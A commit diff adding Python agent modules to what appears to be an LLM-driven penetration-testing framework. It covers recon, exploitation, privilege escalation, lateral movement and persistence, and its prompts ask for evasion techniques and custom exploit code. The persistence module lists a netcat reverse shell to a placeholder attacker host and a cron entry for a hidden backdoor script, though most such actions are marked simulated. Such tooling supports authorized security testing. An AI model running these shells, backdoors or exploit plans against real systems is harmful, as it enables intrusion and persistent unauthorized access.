Add files via upload

This commit is contained in:
Joas A Santos
2025-12-18 18:18:29 -03:00
committed by GitHub
parent cd904bad0b
commit 078e48b9ed
41 changed files with 4886 additions and 0 deletions

0
agents/__init__.py Normal file
View File

78
agents/base_agent.py Normal file
View File

@@ -0,0 +1,78 @@
import json
import logging
from typing import Dict, Any, List, Optional
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class BaseAgent:
"""
A generic agent class that orchestrates LLM interactions, tool usage,
and adheres to specific agent roles (e.g., Red Team, Blue Team).
"""
def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict):
self.agent_name = agent_name
self.config = config
self.llm_manager = llm_manager
self.context_prompts = context_prompts # This will contain user_prompt and system_prompt for this agent role
self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {})
self.tools_allowed = self.agent_role_config.get('tools_allowed', [])
self.description = self.agent_role_config.get('description', 'No description provided.')
logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}")
def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str:
"""
Prepares the user prompt for the LLM, incorporating agent-specific instructions
and dynamic context.
"""
user_prompt_template = self.context_prompts.get("user_prompt", "")
if not user_prompt_template:
logger.warning(f"No user prompt template found for agent {self.agent_name}.")
return user_input # Fallback to raw user input
# Format the user prompt with dynamic context
# Use a safe way to format, ensuring all expected keys are present or handled.
# This assumes the template uses specific placeholders like {target_info_json}, {recon_data_json} etc.
# For a generic solution, we pass all additional_context as a single JSON.
try:
formatted_prompt = user_prompt_template.format(
user_input=user_input,
additional_context_json=json.dumps(additional_context or {}, indent=2)
# Add more specific placeholders if needed, like target_info_json, recon_data_json etc.
# E.g., target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2)
)
except KeyError as e:
logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.")
formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}"
return formatted_prompt
def execute(self, user_input: str, campaign_data: Dict = None) -> Dict:
"""
Executes the agent's task using the LLM and potentially external tools.
`campaign_data` can be used to pass ongoing results or context between agent executions.
"""
logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...")
system_prompt = self.context_prompts.get("system_prompt", "")
if not system_prompt:
logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.")
system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response."
# Prepare the user prompt with current input and campaign data
prepared_user_prompt = self._prepare_prompt(user_input, campaign_data)
llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt)
# Here's where we would integrate tool usage based on llm_response_text
# and self.tools_allowed. This will be more complex and potentially involve
# re-prompting the LLM or using a function-calling mechanism.
# For now, just return the LLM's direct response.
return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text}
def get_allowed_tools(self) -> List[str]:
"""Returns the list of tools allowed for this agent role."""
return self.tools_allowed

View File

@@ -0,0 +1,256 @@
#!/usr/bin/env python3
"""
Exploitation Agent - Vulnerability exploitation and access gaining
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.exploitation import (
ExploitDatabase,
MetasploitWrapper,
WebExploiter,
SQLInjector,
RCEExploiter,
BufferOverflowExploiter
)
logger = logging.getLogger(__name__)
class ExploitationAgent:
    """Agent responsible for vulnerability exploitation.

    Pipeline: identify candidate vulnerabilities from recon data, ask the LLM
    for an exploitation plan, dispatch exploits to the specialized tool
    wrappers, then collect post-exploitation intelligence.
    """

    def __init__(self, config: Dict):
        """Initialize exploitation agent and its exploitation tool wrappers."""
        self.config = config
        self.llm = LLMManager(config)
        self.exploit_db = ExploitDatabase(config)
        self.metasploit = MetasploitWrapper(config)
        self.web_exploiter = WebExploiter(config)
        self.sql_injector = SQLInjector(config)
        self.rce_exploiter = RCEExploiter(config)
        self.bof_exploiter = BufferOverflowExploiter(config)
        logger.info("ExploitationAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute exploitation phase.

        Args:
            target: Target host/URL under test.
            context: Campaign context; recon results are read from
                context['phases']['recon'].

        Returns:
            Result dict with status, successful/failed exploits, shells,
            credentials and AI recommendations. Never raises; errors are
            recorded under 'error'.
        """
        logger.info(f"Starting exploitation on {target}")
        results = {
            "target": target,
            "status": "running",
            "successful_exploits": [],
            "failed_attempts": [],
            "shells_obtained": [],
            "credentials_found": [],
            "ai_recommendations": {}
        }
        try:
            # Get reconnaissance data from context
            recon_data = context.get("phases", {}).get("recon", {})
            # Phase 1: Vulnerability Analysis
            logger.info("Phase 1: Analyzing vulnerabilities")
            vulnerabilities = self._identify_vulnerabilities(recon_data)
            # Phase 2: AI-powered Exploit Selection
            logger.info("Phase 2: AI exploit selection")
            exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
            results["ai_recommendations"] = exploit_plan
            # Phase 3: Execute Exploits
            logger.info("Phase 3: Executing exploits")
            for vuln in vulnerabilities[:5]:  # Limit to top 5 vulnerabilities
                exploit_result = self._attempt_exploitation(vuln, target)
                if exploit_result.get("success"):
                    results["successful_exploits"].append(exploit_result)
                    logger.info(f"Successful exploit: {vuln.get('type')}")
                    # Check for shell access
                    if exploit_result.get("shell_access"):
                        results["shells_obtained"].append(exploit_result["shell_info"])
                else:
                    results["failed_attempts"].append(exploit_result)
            # Phase 4: Post-Exploitation Intelligence
            if results["successful_exploits"]:
                logger.info("Phase 4: Post-exploitation intelligence gathering")
                results["post_exploit_intel"] = self._gather_post_exploit_intel(
                    results["successful_exploits"]
                )
            results["status"] = "completed"
            logger.info("Exploitation phase completed")
        except Exception as e:
            logger.error(f"Error during exploitation: {e}")
            results["status"] = "error"
            results["error"] = str(e)
        return results

    def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
        """Identify exploitable vulnerabilities from recon data.

        Every open network service and every flagged web vulnerability class
        becomes one candidate entry.
        """
        vulnerabilities = []
        # Check network scan results: each open port is a candidate service.
        network_scan = recon_data.get("network_scan", {})
        for host, data in network_scan.get("hosts", {}).items():
            for port in data.get("open_ports", []):
                vulnerabilities.append({
                    "type": "network_service",
                    "host": host,
                    "port": port.get("port"),
                    "service": port.get("service"),
                    "version": port.get("version")
                })
        # Check web vulnerabilities reported by the web analysis phase.
        web_analysis = recon_data.get("web_analysis", {})
        for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
            if web_analysis.get(vuln_type):
                vulnerabilities.append({
                    "type": vuln_type,
                    "details": web_analysis[vuln_type]
                })
        return vulnerabilities

    def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
        """Use AI to plan exploitation strategy.

        Returns:
            The parsed JSON plan, or {"error": ...} on any failure.
        """
        # BUG FIX: the default template must keep {vulnerabilities_json} and
        # {recon_data_json} as literal placeholders. It is rendered with
        # str.format() below; the previous f-string pre-rendered the JSON,
        # whose literal braces then made str.format() raise.
        prompt = self.llm.get_prompt(
            "exploitation",
            "ai_exploit_planning_user",
            default="""
            Plan an exploitation strategy based on the following data:
            Vulnerabilities Identified:
            {vulnerabilities_json}
            Reconnaissance Data:
            {recon_data_json}
            Provide:
            1. Prioritized exploitation order
            2. Recommended exploits for each vulnerability
            3. Payload suggestions
            4. Evasion techniques
            5. Fallback strategies
            6. Success probability estimates
            Response in JSON format with detailed exploitation roadmap.
            """
        )
        system_prompt = self.llm.get_prompt(
            "exploitation",
            "ai_exploit_planning_system",
            default="""You are an expert exploit developer and penetration tester.
            Create sophisticated exploitation plans considering detection, success rates, and impact.
            Prioritize stealthy, reliable exploits over noisy attempts."""
        )
        try:
            formatted_prompt = prompt.format(
                vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
                recon_data_json=json.dumps(recon_data, indent=2)
            )
            response = self.llm.generate(formatted_prompt, system_prompt)
            # The model is instructed to answer with JSON only.
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI exploit planning error: {e}")
            return {"error": str(e)}

    def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
        """Attempt to exploit a specific vulnerability.

        Dispatches to the matching tool wrapper by vulnerability type, falling
        back to Metasploit for unrecognized types. Never raises; errors are
        reported in the returned dict.
        """
        vuln_type = vulnerability.get("type")
        result = {
            "vulnerability": vulnerability,
            "success": False,
            "method": None,
            "details": {}
        }
        try:
            if vuln_type == "sql_injection":
                result = self.sql_injector.exploit(target, vulnerability)
            elif vuln_type in ["xss", "csrf"]:
                result = self.web_exploiter.exploit(target, vulnerability)
            elif vuln_type in ["rce", "command_injection"]:
                result = self.rce_exploiter.exploit(target, vulnerability)
            elif vuln_type == "buffer_overflow":
                result = self.bof_exploiter.exploit(target, vulnerability)
            elif vuln_type == "network_service":
                result = self._exploit_network_service(target, vulnerability)
            else:
                # Use Metasploit for generic exploitation
                result = self.metasploit.exploit(target, vulnerability)
        except Exception as e:
            logger.error(f"Exploitation error for {vuln_type}: {e}")
            result["error"] = str(e)
        return result

    def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit network service vulnerabilities.

        Looks up known exploits for the service/version and tries the top
        three via Metasploit, returning on the first success.
        """
        service = vulnerability.get("service", "").lower()
        # Check exploit database for known exploits
        exploits = self.exploit_db.search(service, vulnerability.get("version"))
        if exploits:
            logger.info(f"Found {len(exploits)} exploits for {service}")
            for exploit in exploits[:3]:  # Try top 3 exploits
                result = self.metasploit.run_exploit(
                    exploit["module"],
                    target,
                    vulnerability.get("port")
                )
                if result.get("success"):
                    return result
        return {"success": False, "message": "No suitable exploits found"}

    def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
        """Gather intelligence after successful exploitation.

        Placeholder: a real implementation would run commands over the
        obtained shells; currently emits static demonstration records.
        """
        intel = {
            "system_info": [],
            "user_accounts": [],
            "network_info": [],
            "installed_software": [],
            "credentials": []
        }
        for exploit in successful_exploits:
            if exploit.get("shell_access"):
                # Reserved for real command execution over this shell.
                shell = exploit["shell_info"]
                intel["system_info"].append({
                    "os": "detected_os",
                    "hostname": "detected_hostname",
                    "architecture": "x64"
                })
        return intel

    def generate_custom_exploit(self, vulnerability: Dict) -> str:
        """Generate custom exploit using AI (delegates to the LLM manager)."""
        target_info = {
            "vulnerability": vulnerability,
            "requirements": "Create working exploit code"
        }
        return self.llm.generate_payload(target_info, vulnerability.get("type"))

199
agents/lateral_agent.py Normal file
View File

@@ -0,0 +1,199 @@
#!/usr/bin/env python3
"""
Lateral Movement Agent - Move through the network
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class LateralMovementAgent:
    """Agent responsible for lateral movement.

    Discovers internal hosts from recon data and simulates credential reuse,
    Pass-the-Hash and trust-relationship attacks, guided by an LLM-generated
    movement strategy. All attack methods emit simulated records only.
    """

    def __init__(self, config: Dict):
        """Initialize lateral movement agent."""
        self.config = config
        self.llm = LLMManager(config)
        logger.info("LateralMovementAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute lateral movement phase.

        Args:
            target: Initially compromised host the movement starts from.
            context: Campaign context; prior phase results are read from
                context['phases'].

        Returns:
            Result dict with discovered hosts, movement paths and status.
            Never raises; errors are recorded under 'error'.
        """
        logger.info(f"Starting lateral movement from {target}")
        results = {
            "target": target,
            "status": "running",
            "discovered_hosts": [],
            "compromised_hosts": [],
            "credentials_used": [],
            "movement_paths": [],
            "ai_analysis": {}
        }
        try:
            # Get previous phase data
            recon_data = context.get("phases", {}).get("recon", {})
            privesc_data = context.get("phases", {}).get("privilege_escalation", {})
            # Phase 1: Network Discovery
            logger.info("Phase 1: Internal network discovery")
            results["discovered_hosts"] = self._discover_internal_network(recon_data)
            # Phase 2: AI-Powered Movement Strategy
            logger.info("Phase 2: AI lateral movement strategy")
            strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
            results["ai_analysis"] = strategy
            # Phase 3: Credential Reuse
            logger.info("Phase 3: Credential reuse attacks")
            credentials = privesc_data.get("credentials_harvested", [])
            results["credentials_used"] = self._attempt_credential_reuse(
                results["discovered_hosts"],
                credentials
            )
            # Phase 4: Pass-the-Hash/Pass-the-Ticket
            logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
            results["movement_paths"].extend(
                self._pass_the_hash_attacks(results["discovered_hosts"])
            )
            # Phase 5: Exploit Trust Relationships
            logger.info("Phase 5: Exploiting trust relationships")
            results["movement_paths"].extend(
                self._exploit_trust_relationships(results["discovered_hosts"])
            )
            results["status"] = "completed"
            logger.info("Lateral movement phase completed")
        except Exception as e:
            logger.error(f"Error during lateral movement: {e}")
            results["status"] = "error"
            results["error"] = str(e)
        return results

    def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
        """Discover internal network hosts.

        Combines hosts seen in the recon network scan with static simulated
        hosts representing further internal discovery.
        """
        hosts = []
        # Extract hosts from recon data
        network_scan = recon_data.get("network_scan", {})
        for ip, data in network_scan.get("hosts", {}).items():
            hosts.append({
                "ip": ip,
                "ports": data.get("open_ports", []),
                "os": data.get("os", "unknown")
            })
        # Simulate additional internal discovery
        hosts.extend([
            {"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
            {"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
            {"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
        ])
        return hosts

    def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
        """Use AI to plan lateral movement.

        Returns:
            The parsed JSON strategy, or {"error": ...} on any failure.
        """
        # BUG FIX: the default template must keep {context_json}/{hosts_json}
        # as literal placeholders. It is rendered with str.format() below; the
        # previous f-string pre-rendered the JSON, whose literal braces then
        # made str.format() raise.
        prompt = self.llm.get_prompt(
            "lateral_movement",
            "ai_movement_strategy_user",
            default="""
            Plan a lateral movement strategy based on the following:
            Current Context:
            {context_json}
            Discovered Hosts:
            {hosts_json}
            Provide:
            1. Target prioritization (high-value targets first)
            2. Movement techniques for each target
            3. Credential strategies
            4. Evasion techniques
            5. Attack path optimization
            6. Fallback options
            Response in JSON format with detailed attack paths.
            """
        )
        system_prompt = self.llm.get_prompt(
            "lateral_movement",
            "ai_movement_strategy_system",
            default="""You are an expert in lateral movement and Active Directory attacks.
            Plan sophisticated movement strategies that minimize detection and maximize impact.
            Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
            Prioritize domain controllers and critical infrastructure."""
        )
        try:
            formatted_prompt = prompt.format(
                context_json=json.dumps(context, indent=2),
                hosts_json=json.dumps(hosts, indent=2)
            )
            response = self.llm.generate(formatted_prompt, system_prompt)
            # The model is instructed to answer with JSON only.
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI movement strategy error: {e}")
            return {"error": str(e)}

    def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
        """Attempt credential reuse across hosts (simulated).

        Tries at most 5 hosts x 3 credentials; credential material is redacted
        in the returned records.
        """
        attempts = []
        for host in hosts[:5]:  # Limit attempts
            for cred in credentials[:3]:
                attempts.append({
                    "host": host.get("ip"),
                    "credential": "***hidden***",
                    "protocol": "SMB",
                    "success": False,  # Simulated
                    "status": "simulated"
                })
        return attempts

    def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
        """Perform Pass-the-Hash attacks (simulated) against high-value roles."""
        attacks = []
        for host in hosts:
            if host.get("role") in ["domain_controller", "file_server"]:
                attacks.append({
                    "type": "pass_the_hash",
                    "target": host.get("ip"),
                    "technique": "SMB relay",
                    "success": False,  # Simulated
                    "status": "simulated"
                })
        return attacks

    def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
        """Exploit trust relationships (simulated static records)."""
        exploits = []
        # Domain trust exploitation
        exploits.append({
            "type": "domain_trust",
            "description": "Cross-domain exploitation",
            "status": "simulated"
        })
        # Kerberos delegation
        exploits.append({
            "type": "kerberos_delegation",
            "description": "Unconstrained delegation abuse",
            "status": "simulated"
        })
        return exploits

View File

@@ -0,0 +1,148 @@
#!/usr/bin/env python3
"""
Network Reconnaissance Agent - Network-focused information gathering and enumeration
"""
import os
import json
import subprocess
from typing import Dict, List
import logging
from core.llm_manager import LLMManager
from tools.recon import (
NetworkScanner,
OSINTCollector,
DNSEnumerator,
SubdomainFinder
)
from urllib.parse import urlparse # Added import
logger = logging.getLogger(__name__)
class NetworkReconAgent:
    """Agent responsible for network-focused reconnaissance and information gathering"""

    def __init__(self, config: Dict):
        """Initialize network reconnaissance agent and its recon tools."""
        self.config = config
        self.llm = LLMManager(config)
        self.network_scanner = NetworkScanner(config)
        self.osint = OSINTCollector(config)
        self.dns_enum = DNSEnumerator(config)
        self.subdomain_finder = SubdomainFinder(config)
        logger.info("NetworkReconAgent initialized")

    @staticmethod
    def _extract_host(target: str) -> str:
        """Return the bare hostname when *target* is a URL, else *target* itself.

        The recon tools expect a host, not a full URL with scheme/path.
        """
        return urlparse(target).hostname or target

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute network reconnaissance phase.

        Args:
            target: Hostname, IP address or URL to investigate.
            context: Campaign context (not consumed here yet).

        Returns:
            Result dict with scan/DNS/subdomain/OSINT findings and AI
            analysis. Never raises; errors are recorded under 'error'.
        """
        logger.info(f"Starting network reconnaissance on {target}")
        results = {
            "target": target,
            "status": "running",
            "findings": [],
            "network_scan": {},
            "osint": {},
            "dns": {},
            "subdomains": [],
            "ai_analysis": {}
        }
        # Parse target to extract hostname if it's a URL
        target_host = self._extract_host(target)
        logger.info(f"Target for network tools: {target_host}")
        try:
            # Phase 1: Network Scanning
            logger.info("Phase 1: Network scanning")
            results["network_scan"] = self.network_scanner.scan(target_host)
            # Phase 2: DNS Enumeration
            logger.info("Phase 2: DNS enumeration")
            results["dns"] = self.dns_enum.enumerate(target_host)
            # Phase 3: Subdomain Discovery
            logger.info("Phase 3: Subdomain discovery")
            results["subdomains"] = self.subdomain_finder.find(target_host)
            # Phase 4: OSINT Collection
            logger.info("Phase 4: OSINT collection")
            results["osint"] = self.osint.collect(target_host)
            # Phase 5: AI Analysis
            logger.info("Phase 5: AI-powered analysis")
            results["ai_analysis"] = self._ai_analysis(results)
            results["status"] = "completed"
            logger.info("Network reconnaissance phase completed")
        except Exception as e:
            logger.error(f"Error during network reconnaissance: {e}")
            results["status"] = "error"
            results["error"] = str(e)
        return results

    def _ai_analysis(self, recon_data: Dict) -> Dict:
        """Use AI to analyze reconnaissance data.

        Returns:
            The parsed JSON analysis, or an error dict including the raw LLM
            response (when one was received) on failure.
        """
        # BUG FIX: the default template must keep {recon_data_json} as a
        # literal placeholder. It is rendered with str.format() below; the
        # previous f-string pre-rendered the JSON, whose literal braces then
        # made str.format() raise.
        prompt = self.llm.get_prompt(
            "network_recon",
            "ai_analysis_user",
            default="""
            Analyze the following network reconnaissance data and provide insights:
            {recon_data_json}
            Provide:
            1. Attack surface summary
            2. Prioritized network target list
            3. Identified network vulnerabilities or misconfigurations
            4. Recommended next steps for network exploitation
            5. Network risk assessment
            6. Stealth considerations for network activities
            Response in JSON format with actionable recommendations.
            """
        )
        system_prompt = self.llm.get_prompt(
            "network_recon",
            "ai_analysis_system",
            default="""You are an expert network penetration tester analyzing reconnaissance data.
            Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
            Consider both technical and operational security aspects."""
        )
        # Pre-initialize so the error path can report the raw response without
        # the fragile `'response' in locals()` check.
        response = None
        try:
            formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI analysis error: {e}")
            return {"error": str(e), "raw_response": response}

    def passive_recon(self, target: str) -> Dict:
        """Perform passive reconnaissance only (OSINT, DNS, subdomains)."""
        target_host = self._extract_host(target)
        return {
            "osint": self.osint.collect(target_host),
            "dns": self.dns_enum.enumerate(target_host),
            "subdomains": self.subdomain_finder.find(target_host)
        }

    def active_recon(self, target: str) -> Dict:
        """Perform active reconnaissance (direct network scanning)."""
        target_host = self._extract_host(target)
        return {
            "network_scan": self.network_scanner.scan(target_host)
        }

250
agents/persistence_agent.py Normal file
View File

@@ -0,0 +1,250 @@
#!/usr/bin/env python3
"""
Persistence Agent - Maintain access to compromised systems
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class PersistenceAgent:
    """Agent responsible for maintaining access.

    Plans persistence with LLM guidance and emits simulated OS-specific
    persistence mechanisms, backdoors and scheduled tasks.
    """

    def __init__(self, config: Dict):
        """Initialize persistence agent."""
        self.config = config
        self.llm = LLMManager(config)
        logger.info("PersistenceAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute persistence phase.

        Args:
            target: Compromised host to persist on.
            context: Campaign context; privilege escalation results are read
                from context['phases']['privilege_escalation'].

        Returns:
            Result dict; 'status' is "completed", "limited" (no escalation
            achieved) or "error". Never raises.
        """
        logger.info(f"Starting persistence establishment on {target}")
        results = {
            "target": target,
            "status": "running",
            "persistence_mechanisms": [],
            "backdoors_installed": [],
            "scheduled_tasks": [],
            "ai_recommendations": {}
        }
        try:
            # Get previous phase data
            privesc_data = context.get("phases", {}).get("privilege_escalation", {})
            if not privesc_data.get("successful_escalations"):
                logger.warning("No privilege escalation achieved. Limited persistence options.")
                results["status"] = "limited"
            # Phase 1: AI-Powered Persistence Strategy
            logger.info("Phase 1: AI persistence strategy")
            strategy = self._ai_persistence_strategy(context)
            results["ai_recommendations"] = strategy
            # Phase 2: Establish Persistence Mechanisms
            logger.info("Phase 2: Establishing persistence mechanisms")
            system_info = privesc_data.get("system_info", {})
            os_type = system_info.get("os", "unknown")
            if os_type == "linux":
                results["persistence_mechanisms"].extend(
                    self._establish_linux_persistence()
                )
            elif os_type == "windows":
                results["persistence_mechanisms"].extend(
                    self._establish_windows_persistence()
                )
            # Phase 3: Install Backdoors
            logger.info("Phase 3: Installing backdoors")
            results["backdoors_installed"] = self._install_backdoors(os_type)
            # Phase 4: Create Scheduled Tasks
            logger.info("Phase 4: Creating scheduled tasks")
            results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)
            # BUG FIX: preserve the earlier "limited" marker; previously it was
            # always clobbered with "completed".
            if results["status"] != "limited":
                results["status"] = "completed"
            logger.info("Persistence phase completed")
        except Exception as e:
            logger.error(f"Error during persistence: {e}")
            results["status"] = "error"
            results["error"] = str(e)
        return results

    def _ai_persistence_strategy(self, context: Dict) -> Dict:
        """Use AI to plan persistence strategy.

        Returns:
            The parsed JSON strategy, or {"error": ...} on any failure.
        """
        # BUG FIX: the default template must keep {context_json} as a literal
        # placeholder. It is rendered with str.format() below; the previous
        # f-string pre-rendered the JSON, whose literal braces then made
        # str.format() raise.
        prompt = self.llm.get_prompt(
            "persistence",
            "ai_persistence_strategy_user",
            default="""
            Plan a comprehensive persistence strategy based on the following context:
            {context_json}
            Provide:
            1. Recommended persistence techniques (prioritized)
            2. Stealth considerations
            3. Resilience against system reboots
            4. Evasion of detection mechanisms
            5. Multiple fallback mechanisms
            6. Cleanup and removal procedures
            Response in JSON format with detailed implementation plan.
            """
        )
        system_prompt = self.llm.get_prompt(
            "persistence",
            "ai_persistence_strategy_system",
            default="""You are an expert in persistence techniques and advanced persistent threats.
            Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
            Consider both Windows and Linux environments.
            Prioritize operational security and longevity."""
        )
        try:
            formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
            response = self.llm.generate(formatted_prompt, system_prompt)
            # The model is instructed to answer with JSON only.
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI persistence strategy error: {e}")
            return {"error": str(e)}

    def _establish_linux_persistence(self) -> List[Dict]:
        """Establish Linux persistence mechanisms (simulated static records)."""
        mechanisms = []
        # Cron job
        mechanisms.append({
            "type": "cron_job",
            "description": "Scheduled task for persistence",
            "command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
            "status": "simulated"
        })
        # SSH key
        mechanisms.append({
            "type": "ssh_key",
            "description": "Authorized keys persistence",
            "location": "~/.ssh/authorized_keys",
            "status": "simulated"
        })
        # Systemd service
        mechanisms.append({
            "type": "systemd_service",
            "description": "Persistent system service",
            "service_name": "system-update.service",
            "status": "simulated"
        })
        # bashrc modification
        mechanisms.append({
            "type": "bashrc",
            "description": "Shell initialization persistence",
            "location": "~/.bashrc",
            "status": "simulated"
        })
        return mechanisms

    def _establish_windows_persistence(self) -> List[Dict]:
        """Establish Windows persistence mechanisms (simulated static records)."""
        mechanisms = []
        # Registry Run key
        mechanisms.append({
            "type": "registry_run",
            "description": "Registry autorun persistence",
            "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
            "status": "simulated"
        })
        # Scheduled task
        mechanisms.append({
            "type": "scheduled_task",
            "description": "Windows scheduled task",
            "task_name": "WindowsUpdate",
            "status": "simulated"
        })
        # WMI event subscription
        mechanisms.append({
            "type": "wmi_event",
            "description": "WMI persistence",
            "status": "simulated"
        })
        # Service installation
        mechanisms.append({
            "type": "service",
            "description": "Windows service persistence",
            "service_name": "WindowsSecurityUpdate",
            "status": "simulated"
        })
        return mechanisms

    def _install_backdoors(self, os_type: str) -> List[Dict]:
        """Install backdoors (simulated); empty list for unknown OS types."""
        backdoors = []
        if os_type == "linux":
            backdoors.extend([
                {
                    "type": "reverse_shell",
                    "description": "Netcat reverse shell",
                    "command": "nc -e /bin/bash attacker_ip 4444",
                    "status": "simulated"
                },
                {
                    "type": "ssh_backdoor",
                    "description": "SSH backdoor on alternate port",
                    "port": 2222,
                    "status": "simulated"
                }
            ])
        elif os_type == "windows":
            backdoors.extend([
                {
                    "type": "powershell_backdoor",
                    "description": "PowerShell reverse shell",
                    "status": "simulated"
                },
                {
                    "type": "meterpreter",
                    "description": "Meterpreter payload",
                    "status": "simulated"
                }
            ])
        return backdoors

    def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
        """Create scheduled tasks (simulated); empty list for unknown OS types."""
        tasks = []
        if os_type == "linux":
            tasks.append({
                "type": "cron",
                "schedule": "*/10 * * * *",
                "command": "Callback beacon every 10 minutes",
                "status": "simulated"
            })
        elif os_type == "windows":
            tasks.append({
                "type": "scheduled_task",
                "schedule": "Daily at 2 AM",
                "command": "Callback beacon",
                "status": "simulated"
            })
        return tasks

305
agents/privesc_agent.py Normal file
View File

@@ -0,0 +1,305 @@
#!/usr/bin/env python3
"""
Privilege Escalation Agent - System privilege elevation
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.privesc import (
LinuxPrivEsc,
WindowsPrivEsc,
KernelExploiter,
MisconfigFinder,
CredentialHarvester,
SudoExploiter
)
logger = logging.getLogger(__name__)
class PrivEscAgent:
    """Agent responsible for privilege escalation"""

    def __init__(self, config: Dict):
        """Initialize privilege escalation agent and its tool wrappers."""
        self.config = config
        self.llm = LLMManager(config)
        # OS-specific enumeration/exploitation helpers used by the phase
        # methods below.
        self.linux_privesc = LinuxPrivEsc(config)
        self.windows_privesc = WindowsPrivEsc(config)
        self.kernel_exploiter = KernelExploiter(config)
        self.misconfig_finder = MisconfigFinder(config)
        self.cred_harvester = CredentialHarvester(config)
        self.sudo_exploiter = SudoExploiter(config)
        logger.info("PrivEscAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
    """Execute privilege escalation phase.

    Enumerates the compromised system, ranks candidate escalation paths,
    consults the LLM for a strategy, tries up to five paths (stopping at the
    first success) and finally harvests credentials. Never raises; failures
    are reported via the returned dict's 'status'/'error' fields.
    """
    logger.info(f"Starting privilege escalation on {target}")
    report = {
        "target": target,
        "status": "running",
        "escalation_paths": [],
        "successful_escalations": [],
        "credentials_harvested": [],
        "system_info": {},
        "ai_analysis": {}
    }
    try:
        exploit_data = context.get("phases", {}).get("exploitation", {})
        if not exploit_data.get("successful_exploits"):
            # Without a foothold there is nothing to escalate from.
            logger.warning("No successful exploits found. Limited privilege escalation options.")
            report["status"] = "skipped"
            report["message"] = "No initial access obtained"
            return report
        logger.info("Phase 1: System enumeration")
        report["system_info"] = self._enumerate_system(exploit_data)
        logger.info("Phase 2: Identifying escalation paths")
        report["escalation_paths"] = self._identify_escalation_paths(report["system_info"])
        logger.info("Phase 3: AI escalation strategy")
        report["ai_analysis"] = self._ai_escalation_strategy(
            report["system_info"],
            report["escalation_paths"]
        )
        logger.info("Phase 4: Executing escalation attempts")
        for candidate in report["escalation_paths"][:5]:
            outcome = self._attempt_escalation(candidate, report["system_info"])
            if not outcome.get("success"):
                continue
            report["successful_escalations"].append(outcome)
            logger.info(f"Successful escalation: {candidate.get('technique')}")
            break  # Stop after first successful escalation
        if report["successful_escalations"]:
            logger.info("Phase 5: Harvesting credentials")
            report["credentials_harvested"] = self._harvest_credentials(report["system_info"])
        report["status"] = "completed"
        logger.info("Privilege escalation phase completed")
    except Exception as e:
        logger.error(f"Error during privilege escalation: {e}")
        report["status"] = "error"
        report["error"] = str(e)
    return report
def _enumerate_system(self, exploit_data: Dict) -> Dict:
    """Enumerate system for privilege escalation opportunities.

    Builds a baseline info skeleton, detects the OS from the exploitation
    results, then merges in the OS-specific enumeration output.
    """
    os_type = self._detect_os_type(exploit_data)
    info = {
        "os": os_type,
        "kernel_version": "unknown",
        "architecture": "unknown",
        "users": [],
        "groups": [],
        "sudo_permissions": [],
        "suid_binaries": [],
        "writable_paths": [],
        "scheduled_tasks": [],
        "services": [],
        "environment_variables": {}
    }
    if os_type == "linux":
        info.update(self.linux_privesc.enumerate())
    elif os_type == "windows":
        info.update(self.windows_privesc.enumerate())
    return info
def _detect_os_type(self, exploit_data: Dict) -> str:
"""Detect operating system type"""
# Placeholder - would analyze exploit data to determine OS
return "linux" # Default assumption
